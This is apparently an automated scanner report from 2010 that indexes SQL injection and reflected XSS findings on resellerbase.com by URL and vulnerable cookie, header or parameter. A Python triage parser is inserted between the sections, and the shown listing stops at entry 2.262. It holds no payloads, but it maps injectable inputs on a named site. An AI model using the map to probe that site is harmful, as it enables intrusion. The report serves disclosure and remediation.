Report generated by XSS.CX at Thu Nov 18 07:14:17 EST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection

1.1. http://www.resellerbase.com/admin/ [COOKIE_SORT_BY cookie]

1.2. http://www.resellerbase.com/sendmail.php/ [Referer HTTP header]

1.3. http://www.resellerbase.com/tag/adult [REST URL parameter 1]

1.4. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 1]

1.5. http://www.resellerbase.com/tag/travel [REST URL parameter 1]

1.6. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

1.7. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

1.8. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]

1.9. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

1.10. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

1.11. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

1.12. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_ORDER cookie]

1.13. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie]

1.14. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie]

1.15. http://www.resellerbase.com/user_detail.php [REST URL parameter 1]

1.16. http://www.resellerbase.com/user_detail.php [Referer HTTP header]

1.17. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header]

1.18. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header]

1.19. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

1.20. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

1.21. http://www.resellerbase.com/user_detail.php [u parameter]

1.22. http://www.resellerbase.com/user_detail.php [u parameter]

1.23. http://www.resellerbase.com/web-service/other/ [REST URL parameter 1]
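The index is grouped by vulnerability class, but for triage it is more useful to regroup the entries by injection vector: a finding in a cookie or a request header cannot be triggered by sending a victim a link, while "REST URL parameter N" findings on many different files under one directory are usually the same path-segment reflection reported once per URL. The parser below is an added example written for this page, not part of the XSS.CX report or of Burp; it reads the bracketed location text in the format used above, classifies each entry, and counts distinct (section, vector, location) buckets. The sample entries are copied from the index on this page; the bucket key is an editorial choice, not something the report states.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample: a handful of entries copied verbatim from the index above.
SAMPLE_INDEX = """\
1.1. http://www.resellerbase.com/admin/ [COOKIE_SORT_BY cookie]
1.2. http://www.resellerbase.com/sendmail.php/ [Referer HTTP header]
1.3. http://www.resellerbase.com/tag/adult [REST URL parameter 1]
1.6. http://www.resellerbase.com/user_detail.php [COOKIE_SORT_BY cookie]
1.13. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie]
1.17. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header]
1.19. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]
1.21. http://www.resellerbase.com/user_detail.php [u parameter]
2.4. http://www.resellerbase.com/a [select parameter]
2.77. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 1]
2.78. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 2]
"""

# "<section>.<index>. <url> [<location>]" -- the line shape used by this index.
ENTRY_RE = re.compile(
    r"^(?P<sec>\d+)\.(?P<idx>\d+)\.\s+(?P<url>\S+)\s+\[(?P<where>[^\]]+)\]\s*$"
)


def classify(where):
    """Map the bracketed location text to (vector, name).

    vector is one of: cookie, header, path-segment, param-name, param, other.
    name is the cookie/header/parameter name, the path-segment position, or None.
    """
    if where.endswith(" cookie"):
        return "cookie", where[: -len(" cookie")]
    if where.endswith(" HTTP header"):
        return "header", where[: -len(" HTTP header")]
    m = re.match(r"REST URL parameter (\d+)$", where)
    if m:
        return "path-segment", int(m.group(1))
    if where.startswith("name of an arbitrarily supplied"):
        return "param-name", None
    if where.endswith(" parameter"):
        return "param", where[: -len(" parameter")]
    return "other", where


def parse_index(text):
    """Parse index lines into dicts; lines that do not match the shape are skipped."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        vector, name = classify(m.group("where"))
        findings.append(
            {
                "section": int(m.group("sec")),
                "index": int(m.group("idx")),
                "path": urlsplit(m.group("url")).path,
                "vector": vector,
                "name": name,
            }
        )
    return findings


def summarize(findings):
    """Return (count per vector, set of distinct (section, vector, name) buckets).

    Keying buckets on the injection location rather than the URL collapses the
    per-file repeats of "REST URL parameter N" into one item to retest.
    """
    by_vector = Counter(f["vector"] for f in findings)
    buckets = {(f["section"], f["vector"], f["name"]) for f in findings}
    return by_vector, buckets


def non_link_vectors(findings):
    """Findings that live in cookies or headers: not reachable from a crafted link alone."""
    return [f for f in findings if f["vector"] in ("cookie", "header")]


if __name__ == "__main__":
    found = parse_index(SAMPLE_INDEX)
    counts, buckets = summarize(found)
    print(dict(counts))
    print(f"{len(found)} entries -> {len(buckets)} distinct injection locations")
    for f in non_link_vectors(found):
        print(f"  section {f['section']}: {f['vector']} {f['name']} on {f['path']}")
```

Run against the full index, the bucket count is what to retest by hand; the per-vector counts show how much of the reflected XSS total is path-segment reflection under the theme image directories versus distinct query parameters such as keyword, opt and select.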

2. Cross-site scripting (reflected)

2.1. http://www.resellerbase.com/a [REST URL parameter 1]

2.2. http://www.resellerbase.com/a [REST URL parameter 1]

2.3. http://www.resellerbase.com/a [name of an arbitrarily supplied request parameter]

2.4. http://www.resellerbase.com/a [select parameter]

2.5. http://www.resellerbase.com/a/more2.html [REST URL parameter 1]

2.6. http://www.resellerbase.com/a/more2.html [REST URL parameter 2]

2.7. http://www.resellerbase.com/add.php [REST URL parameter 1]

2.8. http://www.resellerbase.com/add.php [REST URL parameter 1]

2.9. http://www.resellerbase.com/admin/ [REST URL parameter 1]

2.10. http://www.resellerbase.com/admin/ [name of an arbitrarily supplied request parameter]

2.11. http://www.resellerbase.com/adult/ [REST URL parameter 1]

2.12. http://www.resellerbase.com/adult/ [REST URL parameter 1]

2.13. http://www.resellerbase.com/adult/ [name of an arbitrarily supplied request parameter]

2.14. http://www.resellerbase.com/adult/ [select parameter]

2.15. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 1]

2.16. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 2]

2.17. http://www.resellerbase.com/adult/googlepr.php [link_id parameter]

2.18. http://www.resellerbase.com/adult/googlepr.php [name of an arbitrarily supplied request parameter]

2.19. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1]

2.20. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1]

2.21. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2]

2.22. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2]

2.23. http://www.resellerbase.com/adult/media-chat/ [name of an arbitrarily supplied request parameter]

2.24. http://www.resellerbase.com/adult/media-chat/ [select parameter]

2.25. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 1]

2.26. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 2]

2.27. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 3]

2.28. http://www.resellerbase.com/adult/media-chat/googlepr.php [link_id parameter]

2.29. http://www.resellerbase.com/adult/media-chat/googlepr.php [name of an arbitrarily supplied request parameter]

2.30. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1]

2.31. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 1]

2.32. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2]

2.33. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 2]

2.34. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3]

2.35. http://www.resellerbase.com/adult/media-chat/more2.html [REST URL parameter 3]

2.36. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1]

2.37. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 1]

2.38. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2]

2.39. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 2]

2.40. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3]

2.41. http://www.resellerbase.com/adult/media-chat/search.php [REST URL parameter 3]

2.42. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter]

2.43. http://www.resellerbase.com/adult/media-chat/search.php [Submit3 parameter]

2.44. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter]

2.45. http://www.resellerbase.com/adult/media-chat/search.php [cat parameter]

2.46. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter]

2.47. http://www.resellerbase.com/adult/media-chat/search.php [keyword parameter]

2.48. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

2.49. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

2.50. http://www.resellerbase.com/adult/media-chat/search.php [name of an arbitrarily supplied request parameter]

2.51. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter]

2.52. http://www.resellerbase.com/adult/media-chat/search.php [opt parameter]

2.53. http://www.resellerbase.com/adult/media-chat/search.php [select parameter]

2.54. http://www.resellerbase.com/adult/media-chat/search.php [select parameter]

2.55. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 1]

2.56. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 2]

2.57. http://www.resellerbase.com/adult/media-chat/themes/ [REST URL parameter 3]

2.58. http://www.resellerbase.com/adult/media-chat/themes/ [name of an arbitrarily supplied request parameter]

2.59. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 1]

2.60. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 2]

2.61. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 3]

2.62. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [REST URL parameter 4]

2.63. http://www.resellerbase.com/adult/media-chat/themes/kosmos/ [name of an arbitrarily supplied request parameter]

2.64. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 1]

2.65. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 2]

2.66. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 3]

2.67. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 4]

2.68. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 5]

2.69. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

2.70. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 1]

2.71. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 2]

2.72. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 3]

2.73. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 4]

2.74. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 5]

2.75. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 6]

2.76. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

2.77. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

2.78. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

2.79. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

2.80. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

2.81. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

2.82. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

2.83. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

2.84. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

2.85. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

2.86. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

2.87. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

2.88. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

2.89. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

2.90. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

2.91. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

2.92. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

2.93. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

2.94. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

2.95. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

2.96. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

2.97. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

2.98. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

2.99. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

2.100. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

2.101. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

2.102. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

2.103. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

2.104. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

2.105. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

2.106. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

2.107. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

2.108. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

2.109. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 1]

2.110. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 2]

2.111. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 3]

2.112. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 4]

2.113. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 5]

2.114. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 6]

2.115. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 7]

2.116. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [Submit3 parameter]

2.117. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [keyword parameter]

2.118. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

2.119. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [opt parameter]

2.120. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 1]

2.121. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 2]

2.122. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 3]

2.123. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 4]

2.124. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 5]

2.125. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [REST URL parameter 6]

2.126. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

2.127. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 1]

2.128. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 2]

2.129. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 3]

2.130. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 4]

2.131. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 5]

2.132. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 6]

2.133. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [REST URL parameter 7]

2.134. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

2.135. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 1]

2.136. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 2]

2.137. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 3]

2.138. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 4]

2.139. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 5]

2.140. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 6]

2.141. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [REST URL parameter 7]

2.142. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [Submit3 parameter]

2.143. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [keyword parameter]

2.144. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

2.145. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php [opt parameter]

2.146. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 1]

2.147. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 2]

2.148. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 3]

2.149. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 4]

2.150. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 5]

2.151. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [REST URL parameter 6]

2.152. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [Submit3 parameter]

2.153. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [keyword parameter]

2.154. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

2.155. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php [opt parameter]

2.156. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 1]

2.157. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 2]

2.158. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 3]

2.159. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 4]

2.160. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [REST URL parameter 5]

2.161. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [Submit3 parameter]

2.162. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [keyword parameter]

2.163. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

2.164. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php [opt parameter]

2.165. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 1]

2.166. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 2]

2.167. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 3]

2.168. http://www.resellerbase.com/adult/media-chat/themes/search.php [REST URL parameter 4]

2.169. http://www.resellerbase.com/adult/media-chat/themes/search.php [Submit3 parameter]

2.170. http://www.resellerbase.com/adult/media-chat/themes/search.php [keyword parameter]

2.171. http://www.resellerbase.com/adult/media-chat/themes/search.php [name of an arbitrarily supplied request parameter]

2.172. http://www.resellerbase.com/adult/media-chat/themes/search.php [opt parameter]

2.173. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1]

2.174. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1]

2.175. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2]

2.176. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2]

2.177. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1]

2.178. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1]

2.179. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2]

2.180. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2]

2.181. http://www.resellerbase.com/adult/personals-dating/ [name of an arbitrarily supplied request parameter]

2.182. http://www.resellerbase.com/adult/personals-dating/ [select parameter]

2.183. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 1]

2.184. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 2]

2.185. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 3]

2.186. http://www.resellerbase.com/adult/personals-dating/googlepr.php [link_id parameter]

2.187. http://www.resellerbase.com/adult/personals-dating/googlepr.php [name of an arbitrarily supplied request parameter]

2.188. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 1]

2.189. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 2]

2.190. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 3]

2.191. http://www.resellerbase.com/adult/personals-dating/search.php [Submit3 parameter]

2.192. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter]

2.193. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter]

2.194. http://www.resellerbase.com/adult/personals-dating/search.php [keyword parameter]

2.195. http://www.resellerbase.com/adult/personals-dating/search.php [name of an arbitrarily supplied request parameter]

2.196. http://www.resellerbase.com/adult/personals-dating/search.php [opt parameter]

2.197. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 1]

2.198. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 2]

2.199. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 3]

2.200. http://www.resellerbase.com/adult/personals-dating/themes/ [name of an arbitrarily supplied request parameter]

2.201. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 1]

2.202. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 2]

2.203. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 3]

2.204. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 4]

2.205. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [name of an arbitrarily supplied request parameter]

2.206. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 1]

2.207. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 2]

2.208. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 3]

2.209. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 4]

2.210. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 5]

2.211. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

2.212. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 1]

2.213. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 2]

2.214. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 3]

2.215. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 4]

2.216. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 5]

2.217. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [REST URL parameter 6]

2.218. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

2.219. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 1]

2.220. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 2]

2.221. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 3]

2.222. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 4]

2.223. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 5]

2.224. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [REST URL parameter 6]

2.225. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

2.226. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

2.227. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

2.228. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

2.229. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

2.230. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

2.231. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

2.232. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

2.233. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

2.234. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

2.235. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

2.236. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

2.237. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

2.238. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

2.239. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

2.240. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

2.241. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

2.242. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 1]

2.243. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 2]

2.244. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 3]

2.245. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 4]

2.246. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 5]

2.247. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 6]

2.248. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [REST URL parameter 7]

2.249. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [Submit3 parameter]

2.250. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [keyword parameter]

2.251. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

2.252. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php [opt parameter]

2.253. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 1]

2.254. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 2]

2.255. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 3]

2.256. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 4]

2.257. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 5]

2.258. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [REST URL parameter 6]

2.259. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

2.260. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 1]

2.261. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 2]

2.262. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/0.gif [REST URL parameter 3]

